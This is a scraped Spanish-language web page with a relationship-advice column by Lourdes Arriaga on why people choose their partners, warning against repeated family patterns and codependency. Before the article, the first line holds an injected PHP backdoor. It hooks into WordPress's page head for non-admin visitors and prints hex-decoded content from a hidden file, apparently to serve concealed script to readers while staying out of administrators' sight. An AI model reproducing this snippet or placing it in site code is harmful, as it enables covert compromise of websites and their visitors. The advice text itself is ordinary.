if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ¿Por qué elijo a la pareja que elijo? – La Opinión Universitaria La Opinión Universitaria
Menu

¿Por qué elijo a la pareja que elijo?

Por Lourdes Arriaga

La relación de pareja ha sido un tema que llama la atención de muchos porque, a pesar de que es algo completamente natural, pareciera que encontrar a la pareja que nos hará felices y a quien podremos hacer felices a su vez, no es un asunto simple y, por el contrario, suele tornarse como todo un tema de vida y búsqueda. El amor siempre es una búsqueda.

Se nos presentan situaciones que son incomprensibles para la lógica: el elegido puede no tratarnos con la misma devoción y respeto, otras veces es al revés, sabemos que recibimos lo mejor de la otra persona, pero por alguna extraña razón, no podemos corresponder.

¿Te has preguntado por qué la pareja es una situación de vida que es tema de reflexión tanto si se tiene como si no? Podemos cumplir con todas las actividades diarias, las familiares, las laborales o de estudio, pero cualquier situación con el ser amado causará incomodidad e impactará nuestro día.

La pareja es la única relación en que una persona se ve en otra al mismo nivel, “parejos”; es el reflejo más exacto y fiel de nosotros mismos. Muestra los aspectos positivos que se poseen y los que requieren atención para ser trascendidos, y, por lo tanto, es la mejor oportunidad de crecimiento personal. Muchas veces nos preguntamos si la persona con la que estamos es la adecuada, cuando la pregunta correcta debería ser si yo soy la persona apropiada para mi pareja. Esta cuestión nos hace compartir la responsabilidad de todo lo que ocurre al interior de la relación. Lo que sucede y yo lo permito, o lo que yo hago y otro tolera.

Si alguna vez te has preguntado por qué elegiste a la persona que elegiste y rechazaste a algunas otras aunque eran más agradables para ti; o bien, si te has sorprendido diciendo las mismas cosas que se decían tus padres entre sí o que te decían de niño; si puedes observar cómo repites un ciclo de abuso, de alcoholismo, de peleas o de abandono en tus relaciones; seguramente tienes una información aprendida de la pareja que fue tu único modelo durante la infancia y de quién aprendiste cómo relacionarte y qué esperar de una relación, y, no ha funcionado.

Una Pareja Pareja es aquella que se ve de tú a tú, se edifica mutuamente y se hace crecer. En este proceso se presentan momentos amargos y otros muy dulces; un caminar en el que el cambio es la única constante. Vive tu aventura de pareja con madurez y en amor, y no en codependencias, celos y controles manipuladores que lastiman al otro y a ti mismo. ¡Libérate y sé feliz!

 

Tweets recientes